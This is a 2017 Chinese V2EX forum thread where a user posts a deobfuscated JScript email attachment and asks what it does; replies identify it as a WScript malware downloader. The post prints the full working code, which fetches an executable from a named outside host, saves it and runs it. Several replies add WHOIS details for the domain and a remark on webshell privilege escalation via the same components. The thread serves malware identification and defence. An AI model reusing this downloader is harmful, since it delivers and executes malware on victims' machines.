V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
推荐关注
Meteor
JSLint - a JavaScript code quality tool
jsFiddle
D3.js
WebStorm
推荐书目
JavaScript 权威指南第 5 版
Closure: The Definitive Guide
hjq98765
V2EX  ›  JavaScript

邮箱里收到了这么一个陌生 js 脚本,请问这个脚本是病毒么?

  •  
  •   hjq98765 · 2017-05-13 14:31:33 +08:00 · 4691 次点击
    这是一个创建于 2750 天前的主题,其中的信息可能已经有所发展或是发生改变。

    原文件是一长串乱码,原作者往里面故意添加了许多无意义字符串,删掉那些无意义字符串之后,最终有意义的代码如下:

    var wsh = new ActiveXObject("wscript.shell");
    var sh = new ActiveXObject("shell.application");
    var HTTP = new ActiveXObject("MSXML2.XMLHTTP");
    var Stream = new ActiveXObject("ADODB.Stream");
    var path = wsh.SpecialFolders("Templates")+"\\"+((Math.random()*999999)+9999|0)+".exe";
    HTTP.Open("GET", "http://mopooland.top/404", false);
    HTTP.Send();
    if (HTTP.Status == 200) {
        Stream.Open();
        Stream.Type = 1;
        Stream.Write(HTTP.ResponseBody); 
        Stream.Position = 0;
        Stream.SaveToFile(path, 2);
        Stream.Close(); sh.ShellExecute(path, "", "", "open", 1);
    }
    

    http://mopooland.top/404打开里面什么都没有,求懂 js 的大神帮忙解释一下这个代码是要干嘛?是跟最近卷土重来的比特币病毒有关么?

    原代码见:http://pan.baidu.com/s/1kUComnP

    8 条回复    2017-05-14 12:24:22 +08:00
    liangch
        1
    liangch  
       2017-05-13 14:36:22 +08:00   ❤️ 1
    http://mopooland.top/404 一个可执行的文件
    lbb9432
        2
    lbb9432  
       2017-05-13 14:51:01 +08:00
    Pastsong
        3
    Pastsong  
       2017-05-13 14:51:20 +08:00
    Name:Robert Ruthven
    Organization:Gamblin Artists Colors
    Street:323 SE Division Pl
    City:Portland
    State:OR
    Postal Code:97202
    Country:US
    Phone:+1.5034359411
    Fax:+1.5034359411
    Email:[email protected]

    Whois 都是假信息
    Pastsong
        4
    Pastsong  
       2017-05-13 14:52:15 +08:00
    aristotll
        5
    aristotll  
       2017-05-13 17:29:49 +08:00
    估计用的 是 IE 那一套下载东西
    noe132
        6
    noe132  
       2017-05-13 17:33:12 +08:00
    @aristotll 估计是 windows 下的 js 运行环境。
    crazyskyangel
        7
    crazyskyangel  
       2017-05-13 21:22:07 +08:00
    WScript 中的 JScript 脚本,就是利用 Windows 脚本系统做的病毒下载执行器。
    只要杀毒软件的主动防御好点就能防住,如果是免杀,用户懂点规则也启动不了。
    Mayter
        8
    Mayter  
       2017-05-14 12:24:22 +08:00
    别的我不太清楚,但是拿到 webshell(asp,或者 aspx,asp 居多)提权的时候需要看 wscript.shell shell.application 这两个组件才可以执行系统命令,进而可以执行提权文件进行提权。
    关于   ·   帮助文档   ·   博客   ·   API   ·   FAQ   ·   实用小工具   ·   1368 人在线   最高记录 6679   ·     Select Language
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.5 · 23ms · UTC 17:32 · PVG 01:32 · LAX 09:32 · JFK 12:32
    Developed with CodeLauncher
    ♥ Do have faith in what you're doing.